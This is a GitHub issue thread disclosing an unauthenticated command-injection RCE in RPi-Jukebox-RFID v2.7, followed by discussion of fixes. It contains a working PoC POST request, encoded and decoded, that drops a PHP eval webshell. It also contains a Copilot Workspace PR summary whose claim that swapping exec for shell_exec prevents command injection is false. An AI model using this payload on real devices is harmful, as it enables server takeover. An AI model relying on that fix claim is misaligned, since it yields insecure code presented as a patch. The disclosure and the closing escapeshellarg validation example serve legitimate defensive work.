🐛 | RPi-Jukebox-RFID V2.7_RCE_1 #2396
Comments
I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC:
Poc_fixed
Data
Here is Data without url encoding for ease of understanding:
Manual verification

Thanks for bringing that up. If you want you could also open a PR which would fix these issues.

Thank you for your reply. Recently, I have been focusing on reporting vulnerabilities in multiple web applications, so I am unable to help you fix this issue in the short term.
How does this POC work
For this series of issues, it is essentially because the part of the code that executes commands is introduced without checking the data submitted by the user. Taking this RCE vulnerability as an example:
The value of
When the commands executed by the program can be controlled by the user, it is easy to produce unexpected effects. For hackers, they are committed to uploading some Trojans to gain control of the server. The effect of this PoC is to make the executed command look like the following:
It can be noted that the semicolon (;) in the PoC enables the execution of multiple commands here, with the second command writing a webshell named shell.php to the file system (
How to fix
Because I don't have time to open a PR to fix these vulnerabilities in the short term, I am here to provide some fix suggestions:
I hope it can help you

Fix the Remote Code Execution (RCE) vulnerability in `htdocs/inc.setWlanIpMail.php` by sanitizing and validating user input. See #2396

* **Sanitization and Validation:**
  - Add validation for the email address using `filter_var` with `FILTER_VALIDATE_EMAIL`.
  - Add sanitization for the email address using `htmlspecialchars`.
  - Replace the `exec` function with `shell_exec` to prevent command injection.
* **Unit Tests:**
  - Add `tests/htdocs/inc/SetWlanIpMailTest.php` to validate the email address using `filter_var` with `FILTER_VALIDATE_EMAIL`.
  - Add unit tests to sanitize the email address using `htmlspecialchars`.
  - Add unit tests to ensure the `exec` function is replaced with `shell_exec`.

---

For more details, open the [Copilot Workspace session](https://copilot-workspace.githubnext.com/MiczFlor/RPi-Jukebox-RFID?shareId=XXXX-XXXX-XXXX-XXXX).

Version
v2.7.0
Branch
released
OS
ubuntu 22
Pi model
unknown
Hardware
No response
What happened?
Hello,
I would like to report an RCE vulnerability in RPi-Jukebox-RFID-v2.7 (No permissions required)
Analysis
The path of the vulnerability: htdocs\inc.setWlanIpMail.php
Source from Line 36 (`$_POST['WlanIpMailAddr']`). And then there are three check points, for which we should set `$_POST['WlanIpMailYN'] = 1` to bypass. After bypassing the three check points, the source (tainted) passes to `$WlanIpMailAddr` and `exec($exec);` (Line 52) without another check.
Poc
POST /htdocs/inc.setWlanIpMail.php
Data:
WlanIpMailYN=1&WlanIpMailAddr=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell.php++%3b+echo+%22hello
Here is Data without url encoding for ease of understanding:
WlanIpMailYN=1&WlanIpMailAddr=hello" ; echo "<?php @eval($_POST['pass']) ?>" > ./shell.php ; echo "hello
Manual verification
The attacker can then easily connect to this webshell(/htdocs/shell.php)
Logs
No response
Configuration
No response
More info
No response
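
The input handling discussed in this thread, as an added example that is not part of the issue and not the project's code: it validates the submitted address against a strict allowlist and quotes it with `escapeshellarg()` before it reaches a command string. The function names, the command template and the file path are hypothetical, and the sample inputs are constructed.

```php
<?php
// Added example, not the project's code. Function names, the command
// template and the config path are hypothetical.

// Accept only a conservative e-mail shape; return null for anything else.
function validatedMailAddr(string $raw): ?string
{
    $addr = trim($raw);
    if ($addr === '' || strlen($addr) > 254) {
        return null;
    }
    if (filter_var($addr, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    // FILTER_VALIDATE_EMAIL still allows characters such as ` $ ' | in the
    // local part, so an allowlist is applied on top of it.
    if (preg_match('/\A[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\z/', $addr) !== 1) {
        return null;
    }
    return $addr;
}

// If a shell command is unavoidable, quote every value with escapeshellarg().
function buildStoreCommand(string $addr, string $confFile): string
{
    return 'printf %s ' . escapeshellarg($addr) . ' > ' . escapeshellarg($confFile);
}

// Constructed inputs: a normal address, a value shaped like the one in the
// report (harmless command), and an address that passes filter_var alone.
$samples = [
    'parent@example.com',
    'hello" ; echo injected ; echo "hello',
    'a`id`@example.com',
];

foreach ($samples as $raw) {
    $addr = validatedMailAddr($raw);
    if ($addr === null) {
        echo "rejected: {$raw}\n";
        continue;
    }
    echo "accepted: {$addr}\n";
    echo "  command: " . buildStoreCommand($addr, '/tmp/WlanIpMailAddr.conf') . "\n";
}
```

The script only prints the command it would run. Where the value merely needs to be stored, writing it with `file_put_contents()` avoids the shell entirely.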